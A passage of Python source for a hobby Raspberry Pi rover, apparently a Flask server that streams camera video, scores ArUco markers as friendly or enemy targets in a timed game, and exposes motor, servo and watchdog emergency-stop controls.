cv2.putText(frame, 'Cam: Non-Active', (video_Center_X - video_Crosshair_RadiusLength, video_Center_Y + video_Crosshair_RadiusLength + 30), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 2, cv2.LINE_AA)
cv2.putText(frame, 'Arm: Set to Max_180', (video_Center_X - video_Crosshair_RadiusLength, video_Center_Y + video_Crosshair_RadiusLength + 60), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 2, cv2.LINE_AA)
else:
# * Arm in Standby/Neutral/Safety: Max_180 Position, Thus Cam Active: In viewer mode: Green
#
crosshairs_Color_BGR_Tuple_ActivatedNot = (0, 255, 0)
crosshairs_Color_BGR_Tuple_Activated = (0, 0, 255)
target_Color_BGR_Tuple_ActivatedNot = (0, 255, 0)
target_Color_BGR_Tuple_Activated = (0, 0, 255)
target_Color_BGR_Tuple_Activated_Friendly = (255, 0, 0) # Blue irregardless of Arm-Position
cv2.putText(frame, 'Cam: Active', (video_Center_X - video_Crosshair_RadiusLength, video_Center_Y + video_Crosshair_RadiusLength + 30), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 255, 0), 2, cv2.LINE_AA)
cv2.putText(frame, 'Arm: Max_180', (video_Center_X - video_Crosshair_RadiusLength, video_Center_Y + video_Crosshair_RadiusLength + 60), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 255, 0), 2, cv2.LINE_AA)
# * Draw Crosshairs
# ** Draw Crosshairs after AI Image Detection
##jwc o cv2.rectangle(frame, (minX, minY), (maxX, maxY), (255, 255, 255), 2)
##jwc n cv2.rectangle(frame, ((video_Width/2)-50, (video_Height/2)-50), ((video_Width/2)+50, (video_Height/2)+50), (0, 255, 0), 2)
##jwc y cv2.rectangle(frame, (50, 50), (100, 100), (0, 0, 255), 2)
##jwc y cv2.rectangle(frame, (int(video_Width/2)-50, int(video_Height/2)-50), (int(video_Width/2)+50, int(video_Height/2)+50), (0, 255, 0), 2)
##jwc y cv2.rectangle(frame, (video_Center_X - video_Crosshair_RadiusLength, video_Center_Y - video_Crosshair_RadiusLength), (video_Center_X + video_Crosshair_RadiusLength, video_Center_Y + video_Crosshair_RadiusLength), (0, 255, 0), 2)
##jwc y cv2.circle(frame, (video_Center_X, video_Center_Y), video_Crosshair_RadiusLength, (0, 255, 0), 2)
cv2.circle(frame, (video_Center_X, video_Center_Y), video_Crosshair_RadiusLength, crosshairs_Color_BGR_Tuple_ActivatedNot, crosshairs_Line_Thickness)
# verify *at least* one ArUco marker was detected
if len(corners) > 0:
# flatten the ArUco IDs list
ids = ids.flatten()
# loop over the detected ArUCo corners
for (markerCorner, markerID) in zip(corners, ids):
# extract the marker corners (which are always returned
# in top-left, top-right, bottom-right, and bottom-left
# order)
corners = markerCorner.reshape((4, 2))
(topLeft, topRight, bottomRight, bottomLeft) = corners
# convert each of the (x, y)-coordinate pairs to integers
topRight = (int(topRight[0]), int(topRight[1]))
bottomRight = (int(bottomRight[0]), int(bottomRight[1]))
bottomLeft = (int(bottomLeft[0]), int(bottomLeft[1]))
topLeft = (int(topLeft[0]), int(topLeft[1]))
# compute and draw the center (x, y)-coordinates of the ArUco marker
cX = int((topLeft[0] + bottomRight[0]) / 2.0)
cY = int((topLeft[1] + bottomRight[1]) / 2.0)
##jwc o cv2.circle(frame, (cX, cY), 4, (0, 0, 255), -1)
cv2.circle(frame, (cX, cY), 10, (255, 0, 0), -1)
print("*** *** *** DEBUG: cX: " + str(cX) + " cY: " + str(cY))
target_DistanceToVideoCenter_Int = int(math.sqrt( (cX - video_Center_X)**2 + (cY - video_Center_Y)**2 ))
target_ScoreWeightedToVideoCenter_Int = video_Crosshair_RadiusLength - target_DistanceToVideoCenter_Int
##jwc o if math.sqrt( (cX - video_Center_X)**2 + (cY - video_Center_Y)**2 ) <= video_Crosshair_RadiusLength:
if target_DistanceToVideoCenter_Int <= video_Crosshair_RadiusLength:
##jwc y cv2.circle(frame, (video_Center_X, video_Center_Y), video_Crosshair_RadiusLength, color_BGR_Tuple, 4)
cv2.circle(frame, (video_Center_X, video_Center_Y), video_Crosshair_RadiusLength, crosshairs_Color_BGR_Tuple_Activated, crosshairs_Line_Thickness)
# Initialize/Reset for either Friendly or Enemy Targets
##NOT RESET HERE, DO CONDITIONALLY AT SENDING: config_Global_File._timer_Mission_Recharge_Sec_Int = 0
# Friendly Targets
# Appears that Aruco Markers more reliable recognition on inner-part of arm (vs. outer-part of arm)
# Also, white flat margin very important. Any curvature on marker interferes recognition.
# Only allow recharge if not waiting for last non-zero recharge to be sent to clients
if(markerID == 0 or markerID ==1):
# ASAP, Override Enemy-Borders with Friendly-Borders
cv2.line(frame, topLeft, topRight, target_Color_BGR_Tuple_Activated_Friendly, target_Line_thickness)
cv2.line(frame, topRight, bottomRight, target_Color_BGR_Tuple_Activated_Friendly, target_Line_thickness)
cv2.line(frame, bottomRight, bottomLeft, target_Color_BGR_Tuple_Activated_Friendly, target_Line_thickness)
cv2.line(frame, bottomLeft, topLeft, target_Color_BGR_Tuple_Activated_Friendly, target_Line_thickness)
timer_Mission_Countdown_Expired_Sec = config_Global_File._timer_Mission_Duration_MAX_SEC - config_Global_File._timer_Mission_Countdown_Sec
# Recharge Threshold starts at significant-amount of secs
# Due to multiple-requests/threads and asynchronous, 'config_Global_File._timer_Mission_Countdown_Sec' may not be updated in time to prvent
# \ double-dipping invalidly. Thus best to update it asap, to prevent such timing loophole.
##jwc y if(timer_Mission_Countdown_Expired_Sec > int(0.10 * config_Global_File._timer_Mission_Duration_MAX_SEC)):
if(timer_Mission_Countdown_Expired_Sec > int(config_Global_File._timer_Mission_Recharge_THRESHOLD_DEC * config_Global_File._timer_Mission_Duration_MAX_SEC)):
config_Global_File._timer_Mission_Recharge_Sec_Int = timer_Mission_Countdown_Expired_Sec
# Do following asap to prevent multi-threading racing conflict
#
##jwc n config_Global_File._timer_Mission_Countdown_Sec += timer_Mission_Countdown_Expired_Sec
config_Global_File._timer_Mission_Start_Sec += config_Global_File._timer_Mission_Recharge_Sec_Int
config_Global_File._timer_Mission_Countdown_Sec = calculate__timer_Mission_Countdown_Sec__Fn( config_Global_File._timer_Mission_Duration_MAX_SEC, config_Global_File._timer_Mission_Start_Sec, config_Global_File._timer_Mission_Now_Sec)
config_Global_File._timer_Mission_Reserves_Sec_Int -= config_Global_File._timer_Mission_Recharge_Sec_Int
##jwc y cv2.putText(frame, str(markerID), (topLeft[0], topLeft[1] - 30), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 2, cv2.LINE_AA)
cv2.putText(frame, 'Recharge: ' + str(config_Global_File._timer_Mission_Recharge_Sec_Int), (topLeft[0], topLeft[1] - 60), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 2, cv2.LINE_AA)
config_Global_File._timer_Mission_Recharge_Timestamp_Int = config_Global_File._timer_Mission_Now_Sec
print("*** *** *** ***")
print("*** *** *** *** DEBUG: Recharge: ", config_Global_File._timer_Mission_Recharge_Sec_Int, config_Global_File._timer_Mission_Recharge_Timestamp_Int, config_Global_File._timer_Mission_Countdown_Sec, config_Global_File._timer_Mission_Reserves_Sec_Int)
print("*** *** *** ***")
# Enemy Targets
else:
##jwc y color_BGR_Tuple = (0, 0, 255)
# draw the bounding box of the ArUCo detection
cv2.line(frame, topLeft, topRight, target_Color_BGR_Tuple_Activated, target_Line_thickness)
cv2.line(frame, topRight, bottomRight, target_Color_BGR_Tuple_Activated, target_Line_thickness)
cv2.line(frame, bottomRight, bottomLeft, target_Color_BGR_Tuple_Activated, target_Line_thickness)
cv2.line(frame, bottomLeft, topLeft, target_Color_BGR_Tuple_Activated, target_Line_thickness)
# Enemy Targets
if(config_Global_File.servo_03_Degrees == 180):
score_Targeted_Dict[str(markerID)] += 1
##jwc y score_Targeted_ClosenessToVideoCenter_Dict[str(target_DistanceToVideoCenter_Int)] += 1
score_Targeted_WeightedToVideoCenter_Dict[str(target_ScoreWeightedToVideoCenter_Int)] += 1
print("*** *** *** DEBUG: /detect_Motions_And_ArucoMarkers_Fn: score_Targeted_Dict= " + str(score_Targeted_Dict))
print("*** *** *** DEBUG: /detect_Motions_And_ArucoMarkers_Fn: score_Targeted_WeightedToVideoCenter_Dict= " + str(score_Targeted_WeightedToVideoCenter_Dict))
if(config_Global_File._trigger_Client_Req_01_Bool):
score_Targeted_WeightedToVideoCenter_TriggerClient_01_Dict[str(target_ScoreWeightedToVideoCenter_Int)] += 1
config_Global_File._trigger_Client_Req_01_Bool = False
print("*** *** *** *** DEBUG: /detect_Motions_And_ArucoMarkers_Fn: score_Targeted_WeightedToVideoCenter_TriggerClient_01_Dict= " + str(score_Targeted_WeightedToVideoCenter_TriggerClient_01_Dict))
if(config_Global_File._trigger_Client_Req_02_Bool):
score_Targeted_WeightedToVideoCenter_TriggerClient_02_Dict[str(target_ScoreWeightedToVideoCenter_Int)] += 1
config_Global_File._trigger_Client_Req_02_Bool = False
print("*** *** *** *** DEBUG: /detect_Motions_And_ArucoMarkers_Fn: score_Targeted_WeightedToVideoCenter_TriggerClient_02_Dict= " + str(score_Targeted_WeightedToVideoCenter_TriggerClient_02_Dict))
if(config_Global_File._trigger_Client_Req_03_Bool):
score_Targeted_WeightedToVideoCenter_TriggerClient_03_Dict[str(target_ScoreWeightedToVideoCenter_Int)] += 1
config_Global_File._trigger_Client_Req_03_Bool = False
print("*** *** *** *** DEBUG: /detect_Motions_And_ArucoMarkers_Fn: score_Targeted_WeightedToVideoCenter_TriggerClient_03_Dict= " + str(score_Targeted_WeightedToVideoCenter_TriggerClient_03_Dict))
else:
##jwc y color_BGR_Tuple = (0, target_Line_thickness55, 0)
# draw the bounding box of the ArUCo detection
cv2.line(frame, topLeft, topRight, target_Color_BGR_Tuple_ActivatedNot, target_Line_thickness)
cv2.line(frame, topRight, bottomRight, target_Color_BGR_Tuple_ActivatedNot, target_Line_thickness)
cv2.line(frame, bottomRight, bottomLeft, target_Color_BGR_Tuple_ActivatedNot, target_Line_thickness)
cv2.line(frame, bottomLeft, topLeft, target_Color_BGR_Tuple_ActivatedNot, target_Line_thickness)
##jwc ? cv2.circle(frame, (video_Center_X, video_Center_Y), video_Crosshair_RadiusLength, color_BGR_Tuple, 2)
##jwc ? cv2.circle(frame, (video_Center_X, video_Center_Y), video_Crosshair_RadiusLength, crosshairs_Color_BGR_Tuple_ActivatedNot, 4)
# draw the ArUco marker ID on the frame
# * Maker ID: Red Color
##jwc o cv2.putText(frame, str(markerID), (topLeft[0], topLeft[1] - 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)
# https://www.geeksforgeeks.org/python-opencv-cv2-puttext-method/
# * LineTypes: Recommended: LINE_AA = 8-connected line
cv2.putText(frame, str(markerID), (topLeft[0], topLeft[1] - 15), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 2, cv2.LINE_AA)
print("*** DEBUG: /detect_Motions_And_ArucoMarkers_Fn: markerID=" + str(markerID) + " markerID%10=" + str(markerID % 10))
##jwc o 2.1 # show the output frame
##jwc o 2.1 cv2.imshow("Frame", frame)
# Reset _trigger_Client
# End of Cpu-Cycle, so clear flags to false (esp. when true, yet nothing to process)
config_Global_File._trigger_Client_Req_01_Bool = False
config_Global_File._trigger_Client_Req_02_Bool = False
config_Global_File._trigger_Client_Req_03_Bool = False
# * Borrowed from 'detect_Motions_ARCHIVED_Fn()'
#
# jwc rotate 180-degrees to flip image, since cam is wrongly upside-down
##jwc not work as time stamp upside down: frame = imutils.rotate(frame, 180) # https://www.geeksforgeeks.org/python-opencv-cv2-puttext-method/
# * LineTypes: Recommended: LINE_AA = 8-connected line
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7), 0)
# jwc Frame is originally right-side up, yet timestamp-print is upside down
# So, flip upside down before timestamp-print, then re-flip after
##jwc m frame = imutils.rotate(frame, 180)
# grab the current timestamp and draw it on the frame
timestamp = datetime.datetime.now()
# cv2.putText(frame, timestamp.strftime(
# "%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),
# cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
# * Date Stamp: Green Color
# * https://www.geeksforgeeks.org/python-opencv-cv2-puttext-method/
# * LineTypes: Recommended: LINE_AA = 8-connected line
##jwc o cv2.putText(frame, timestamp.strftime("%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
cv2.putText(frame, timestamp.strftime("%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 255, 0), 2, cv2.LINE_AA)
##jwc m # jwc Frame is originally right-side up, yet timestamp-print is upside down
##jwc m # So, flip upside down before timestamp-print, then re-flip after
##jwc m frame = imutils.rotate(frame, 180)
# if the total number of frames has reached a sufficient
# number to construct a reasonable background model, then
# continue to process the frame
if total > frameCount:
# detect motion in the image
motion = motionDetect_Cl_Ob.detect(gray)
# check to see if motion was found in the frame
if motion is not None:
# unpack the tuple and draw the box surrounding the
# "motion area" on the output frame
# ** Use Less-Strong Yellow Color
(thresh, (minX, minY, maxX, maxY)) = motion
##jwc y cv2.rectangle(frame, (minX, minY), (maxX, maxY), (0, 255, 255), 2)
cv2.rectangle(frame, (minX, minY), (maxX, maxY), (127, 127, 127), 2)
# update the background model and increment the total number
# of frames read thus far
motionDetect_Cl_Ob.update(gray)
total += 1
# jwc Frame is originally right-side up, yet timestamp-print is upside down
# So, flip upside down before timestamp-print, then re-flip after
frame = imutils.rotate(frame, 180)
# acquire the lock, set the output frame, and release the
# lock
with lock:
outputFrame = frame.copy()
# Return generated 'outputFrame' for current client request
def generate():
# grab global references to the output frame and lock variables
global outputFrame, lock
# loop over frames from the output stream
while True:
# wait until the lock is acquired
with lock:
# check if the output frame is available, otherwise skip
# the iteration of the loop
if outputFrame is None:
continue
# encode the frame in JPEG format: 'im(age) encode' = 'imencode'
(flag, encodedImage) = cv2.imencode(".jpg", outputFrame)
# ensure the frame was successfully encoded
if not flag:
continue
# yield the output frame in the byte format
yield(b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' +
bytearray(encodedImage) + b'\r\n')
import logging
log = logging.getLogger('werkzeug')
##jwc o log.setLevel(logging.ERROR)
log.setLevel(logging.INFO)
# jwc ~/01-Jwc/2020-1205-0640-RpiRover1-DayDevelops/RpiRover1-master/
# jwc 'sys.path.append('db') does work, depsite 'lint' not understand for 'import'
sys.path.append('db')
import robotProperties_Db_Cl_File
DB = robotProperties_Db_Cl_File.robotProperties_Db_Cl()
dictionary_ReturnValues = DB.read_LeftRight_MotorTrim_Fn()
print("*** DEBUG: DB.read_LeftRight_MotorTrim_Fn: " + json.dumps( dictionary_ReturnValues ))
config_Global_File.left_motor_trim = dictionary_ReturnValues['L']
config_Global_File.right_motor_trim = dictionary_ReturnValues['R']
print ("*** DEBUG: DB: config_Global_File.left_motor_trim: " + str( config_Global_File.left_motor_trim ) + ", config_Global_File.right_motor_trim: " + str( config_Global_File.right_motor_trim ))
dictionary_ReturnValues = DB.read_Heartbeat_Freq_Fn()
print("*** DEBUG: DB.read_Heartbeat_Freq_Fn: " + json.dumps( dictionary_ReturnValues ))
config_Global_File.heartbeat_freq = dictionary_ReturnValues['H']
print ("*** DEBUG: DB: config_Global_File.heartbeat_freq: " + str( config_Global_File.heartbeat_freq ))
##jwc yo app_Cl_Ob = Flask(__name__)
app_Cl_Ob = Flask(__name__, static_url_path='/static')
@app_Cl_Ob.route('/')
def index():
"""Video streaming home page."""
return render_template('index.html')
# jwc 2020-1223 AiCam 2.0 StreamVideoToWebBrowser-AdrianRosebrock
#
@app_Cl_Ob.route("/video_feed")
def video_feed():
# return the response generated along with the specific media
# type (mime type)
return Response(generate(), mimetype = "multipart/x-mixed-replace; boundary=frame")
# General functions for internal-server use only
#
# Immobilizes sytem (chocks on) after 'timeout' seconds
def watchdog_timer():
while config_Global_File._watchdog_Server_Control_C_Inactive_Bool:
# jwc: Pauses every 1sec
##jwc o time.sleep(1)
##jwc
##jwc y decrease for more real-time stats: time.sleep(5)
##jwc still too long: time.sleep(1)
##jwc time.sleep(.10)
##jwc y realize this not affect HUD Stats, so keep as is to prevent premature disconnect
time.sleep(5) ## 5 sec pause, frequency
if config_Global_File._watchdog_EmergencyStop_Inactive_Bool:
config_Global_File._watchdog_Cycles_SinceLastConnect_Now += 1
##jwc print("*** DEBUG: config_Global_File._watchdog_Cycles_SinceLastConnect_Now: " + str(config_Global_File._watchdog_Cycles_SinceLastConnect_Now))
# jwc: appears that beyond 10sec is bad disconnect,
# so engage 'chocks/disable bot', if not already
##jwc o if config_Global_File._watchdog_Cycles_SinceLastConnect_Now > config_Global_File._watchdog_Cycles_SinceLastConnect_MAX and not config_Global_File.chocks:
if config_Global_File._watchdog_Cycles_SinceLastConnect_Now >= config_Global_File._watchdog_Cycles_SinceLastConnect_MAX and not config_Global_File.chocks:
emergencyStop_On_Fn()
##jwc o if config_Global_File._watchdog_Cycles_SinceLastConnect_Now <= config_Global_File._watchdog_Cycles_SinceLastConnect_MAX and config_Global_File.chocks:
if config_Global_File._watchdog_Cycles_SinceLastConnect_Now < config_Global_File._watchdog_Cycles_SinceLastConnect_MAX and config_Global_File.chocks:
emergencyStop_Off_Fn()
# Handler for a clean shutdown when pressing Ctrl-C
def signal_handler(signal, frame):
io_Driver_File.light_blue_blink(0.1)
config_Global_File._watchdog_Server_Control_C_Inactive_Bool = False
config_Global_File.camera_active = False
brakes_on()
# jwc: Wait until thread terminates
watchDog.join()
##jwc o http_server.close()
io_Driver_File.light_blue_off()
sys.exit(0)
# Handler for explorer-hat touchpads
def touch_handler(channel, event):
if channel == 1:
#jwc o
# config_Global_File.blue = not config_Global_File.blue
# if config_Global_File.blue:
# io_Driver_File.light_blue_on()
# io_Driver_File.output_one_on()
# else:
# io_Driver_File.light_blue_off()
# io_Driver_File.output_one_off()
##jwc n AttributeError: servo_01_Pan = autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_PositiionGet_Fn()
##jwc n config_Global_File.servo_01_Pan_Degrees = autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_PositionGet_Fn()
config_Global_File.servo_01_Pan_Degrees = config_Global_File.servo_01_Pan_Degrees - 10
if config_Global_File.servo_01_Pan_Degrees < 0:
config_Global_File.servo_01_Pan_Degrees = 0
autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_Fn( config_Global_File.servo_01_Pan_Degrees )
print("*** DEBUG: S1: servo: pan: " + str(config_Global_File.servo_01_Pan_Degrees))
if channel == 2:
#jwc o
# config_Global_File.yellow = not config_Global_File.yellow
# if config_Global_File.yellow:
# io_Driver_File.light_yellow_on()
# io_Driver_File.output_two_on()
# else:
# io_Driver_File.light_yellow_off()
# io_Driver_File.output_two_off()
##jwc n AttributeError: servo_01_Pan = autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_PositiionGet_Fn()
##jwc n config_Global_File.servo_01_Pan_Degrees = autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_PositionGet_Fn()
config_Global_File.servo_01_Pan_Degrees = config_Global_File.servo_01_Pan_Degrees + 10
if config_Global_File.servo_01_Pan_Degrees > 180:
config_Global_File.servo_01_Pan_Degrees = 180
autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_Fn( config_Global_File.servo_01_Pan_Degrees )
print("*** DEBUG: S1: servo: pan: " + str(config_Global_File.servo_01_Pan_Degrees))
if channel == 3:
config_Global_File.chocks = not config_Global_File.chocks
# jwc: Chocks set to True: Admin Lock
if config_Global_File.chocks:
# jwc: Since Motors not free to operate, Watchdog not needed
config_Global_File._watchdog_EmergencyStop_Inactive_Bool = False
emergencyStop_On_Fn()
# jwc: Chocks set to False: Admin Unlock
else:
# jwc: Since Motors are free to operate, Watchdog is needed
config_Global_File._watchdog_EmergencyStop_Inactive_Bool = True
emergencyStop_Off_Fn()
if channel == 4:
io_Driver_File.light_green_blink(0.1)
#jwc o
# config_Global_File.green = True
# ##jwc o time.sleep(5)
# if config_Global_File.chocks:
# io_Driver_File.light_green_on()
# ##jwc o os.system("sudo -s shutdown -h now")
# else:
# io_Driver_File.light_green_off()
# config_Global_File.green = False
##jwc n config_Global_File.temp = autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_PositionGet_Fn()
##jwc n
# servoCam02Tilt = servoCam02Tilt + 10
# autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_Fn( servoCam02Tilt )
# print("*** DEBUG: S2: servo: tilt: " + str(autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_PositionGet_Fn()))
config_Global_File.servo_02_Tilt_Degrees = config_Global_File.servo_02_Tilt_Degrees - 10
if config_Global_File.servo_02_Tilt_Degrees < 0:
config_Global_File.servo_02_Tilt_Degrees = 0
autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_Fn( config_Global_File.servo_02_Tilt_Degrees )
print("*** DEBUG: S2: servo: tilt: " + str(config_Global_File.servo_02_Tilt_Degrees))
if channel == 5:
io_Driver_File.light_green_blink(0.1)
#jwc o
# config_Global_File.green = True
# ##jwc o time.sleep(5)
# if config_Global_File.chocks:
# io_Driver_File.light_green_on()
# ##jwc o os.system("sudo -s shutdown -h now")
# else:
# io_Driver_File.light_green_off()
# config_Global_File.green = False
##jwc n config_Global_File.temp = autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_PositionGet_Fn()
##jwc n
# servoCam02Tilt = servoCam02Tilt + 10
# autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_Fn( servoCam02Tilt )
# print("*** DEBUG: S2: servo: tilt: " + str(autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_PositionGet_Fn()))
config_Global_File.servo_02_Tilt_Degrees = config_Global_File.servo_02_Tilt_Degrees + 10
if config_Global_File.servo_02_Tilt_Degrees > 180:
config_Global_File.servo_02_Tilt_Degrees = 180
autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_Fn( config_Global_File.servo_02_Tilt_Degrees )
print("*** DEBUG: S2: servo: tilt: " + str(config_Global_File.servo_02_Tilt_Degrees))
def brakes_on():
config_Global_File.brakes = True
config_Global_File.left_motor = 0
config_Global_File.right_motor = 0
##jwc o io_Driver_File.motor_one_speed(config_Global_File.right_motor)
##jwc o io_Driver_File.motor_two_speed(config_Global_File.left_motor)
# jwc: Motors free to operate: Lo-Level: User-Level
def brakes_off():
config_Global_File.brakes = False
config_Global_File._watchdog_Cycles_SinceLastConnect_Now = 0
def emergencyStop_On_Fn():
config_Global_File.chocks = True
brakes_on()
io_Driver_File.light_red_blink(0.2)
# jwc: Motors free to operate: Hi-Level: Admin-Level ~ Overrides User-Level for Security/Safety
def emergencyStop_Off_Fn():
config_Global_File.chocks = False
brakes_off()
io_Driver_File.light_red_off()
def calculate__timer_Mission_Countdown_Sec__Fn(timer_Duration_MAX_IN, timer_Start_In, timer_Now_In):
return timer_Duration_MAX_IN - (timer_Now_In - timer_Start_In)
# Functions for clients to access server
#
""" jwc y
# URL for motor control - format: /motor?l=[speed]&r=[speed]
@app_Cl_Ob.route('/motor')
def motor():
left = request.args.get('l')
##o if left and not config_Global_File.chocks:
if left:
left = int(left)
if left >= -100 and left <= 100:
##o config_Global_File.left_motor = left
##o io_Driver_File.motor_two_speed(config_Global_File.left_motor)
left_normalized = (left / 100 )
motor_1.throttle = left_normalized
time.sleep(3)
motor_1.throttle = -1 * left_normalized
time.sleep(3)
motor_1.throttle = 0
time.sleep(3)
servo_1.angle = 90
time.sleep(3)
servo_1.angle = 135
time.sleep(3)
servo_1.angle = 45
time.sleep(3)
print("motor-left: " + str(servoPwm_PositionMax) + " " + str(left_normalized))
return 'ok'
"""
# URL for motor control - format: /motor?l=[speed]&r=[speed]
@app_Cl_Ob.route('/motor')
def motor():
left = request.args.get('l')
right = request.args.get('r')
print("*** *** DEBUG: left: " + str(left) + " right: " + str(right))
left_normalized = 0
right_normalized = 0
if left and not config_Global_File.chocks:
left_Int = int(left)
config_Global_File.left_motor = left_Int
left_Absolute = abs( left_Int )
if left_Int >= -100 and left_Int <= 100:
##jwc yo config_Global_File.left_motor = left
##jwc o io_Driver_File.motor_two_speed(config_Global_File.left_motor)
##jwc o left_normalized = (left / 100 )
if left_Int >= 0:
##jwc y autoPHat_SparkFun_Driver_File.motorLeft_Fn( left_Int )
autoPHat_SparkFun_Driver_File.motorLeft_Fn( (left_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( (left_Int/100) * 250 )
print("*** DEBUG: L1: motor: L " + str((left_Int/100) * 250))
elif left_Int < 0:
##jwc y autoPHat_SparkFun_Driver_File.motorLeft_Fn( left_Int )
autoPHat_SparkFun_Driver_File.motorLeft_Fn( (left_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( (left_Int/100) * 250 )
print("*** DEBUG: L2: motor: L " + str((left_Int/100) * 250))
else:
print("*** Error: Invalid Value: left_Int: ", left_Int)
##jwc o motor_1.throttle = left_normalized
if right and not config_Global_File.chocks:
right_Int = int(right)
config_Global_File.right_motor = right_Int
right_Absolute = abs( right_Int )
if right_Int >= -100 and right_Int <= 100:
##jwc o config_Global_File.right_motor = right
##jwc o io_Driver_File.motor_one_speed(config_Global_File.right_motor)
##jwc o right_normalized = (right / 100 )
if right_Int >= 0:
##jwc y autoPHat_SparkFun_Driver_File.motorRight_Fn( right_Int )
autoPHat_SparkFun_Driver_File.motorRight_Fn( (right_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( -1 * (right_Int/100) * 250 )
print("*** DEBUG: R1: motor: R " + str((right_Int/100) * 250))
elif right_Int < 0:
##jwc y autoPHat_SparkFun_Driver_File.motorRight_Fn( right_Int )
autoPHat_SparkFun_Driver_File.motorRight_Fn( (right_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( -1 * (right_Int/100) * 250 )
print("*** DEBUG: R2: motor: R " + str((right_Int/100) * 250))
else:
print("*** Error: Invalid Value: right_Int: ", right_Int)
##jwc o motor_2.throttle = right_normalized
##jwc y print("*** DEBUG: motor: l" + str(left_normalized) + " r" + str(right_normalized))
##jwc y print("*** DEBUG: motor: l" + str(left_Int) + " r" + str(right_Int)
##jwc yn print("*** DEBUG: motor: l" + str((left_Int/100) * 250) + " r" + str((right_Int/100) * 250))
return 'ok'
# URL for motor control - format: /motor?l=[speed]&r=[speed]
@app_Cl_Ob.route('/motor_for_turn')
def motor_for_turn():
left = request.args.get('l')
right = request.args.get('r')
print("*** *** DEBUG: left: " + str(left) + " right: " + str(right))
left_normalized = 0
right_normalized = 0
if left and not config_Global_File.chocks:
left_Int = int(left)
config_Global_File.left_motor = left_Int
left_Absolute = abs( left_Int )
if left_Int >= -100 and left_Int <= 100:
##jwc yo config_Global_File.left_motor = left
##jwc o io_Driver_File.motor_two_speed(config_Global_File.left_motor)
##jwc o left_normalized = (left / 100 )
if left_Int >= 0:
##jwc y autoPHat_SparkFun_Driver_File.motorLeft_Fn( left_Int )
autoPHat_SparkFun_Driver_File.motorLeft_Fn( (left_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( (left_Int/100) * 250 )
print("*** DEBUG: L1: motor: L " + str((left_Int/100) * 250))
elif left_Int < 0:
##jwc y autoPHat_SparkFun_Driver_File.motorLeft_Fn( left_Int )
autoPHat_SparkFun_Driver_File.motorLeft_Fn( (left_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( (left_Int/100) * 250 )
print("*** DEBUG: L2: motor: L " + str((left_Int/100) * 250))
else:
print("*** Error: Invalid Value: left_Int: ", left_Int)
##jwc o motor_1.throttle = left_normalized
if right and not config_Global_File.chocks:
right_Int = int(right)
# Since turning, need to invert sign of 'right'
right_Int = -1 * right_Int
config_Global_File.right_motor = right_Int
right_Absolute = abs( right_Int )
if right_Int >= -100 and right_Int <= 100:
##jwc o config_Global_File.right_motor = right
##jwc o io_Driver_File.motor_one_speed(config_Global_File.right_motor)
##jwc o right_normalized = (right / 100 )
if right_Int >= 0:
##jwc y autoPHat_SparkFun_Driver_File.motorRight_Fn( right_Int )
autoPHat_SparkFun_Driver_File.motorRight_Fn( (right_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( -1 * (right_Int/100) * 250 )
print("*** DEBUG: R1: motor: R " + str((right_Int/100) * 250))
elif right_Int < 0:
##jwc y autoPHat_SparkFun_Driver_File.motorRight_Fn( right_Int )
autoPHat_SparkFun_Driver_File.motorRight_Fn( (right_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( -1 * (right_Int/100) * 250 )
print("*** DEBUG: R2: motor: R " + str((right_Int/100) * 250))
else:
print("*** Error: Invalid Value: right_Int: ", right_Int)
##jwc o motor_2.throttle = right_normalized
##jwc y print("*** DEBUG: motor: l" + str(left_normalized) + " r" + str(right_normalized))
##jwc y print("*** DEBUG: motor: l" + str(left_Int) + " r" + str(right_Int)
##jwc yn print("*** DEBUG: motor: l" + str((left_Int/100) * 250) + " r" + str((right_Int/100) * 250))
return 'ok'
@app_Cl_Ob.route('/servo_Cam_01_Pan_Degrees_FrontEnd_Fn')
def servo_Cam_01_Pan_Degrees_FrontEnd_Fn():
servoDegreesInt = int(request.args.get('servo_Cam_01_Pan_Degrees_FrontEnd_Id'))
if servoDegreesInt < 0:
servoDegreesInt = 0
elif servoDegreesInt > 180:
servoDegreesInt = 180
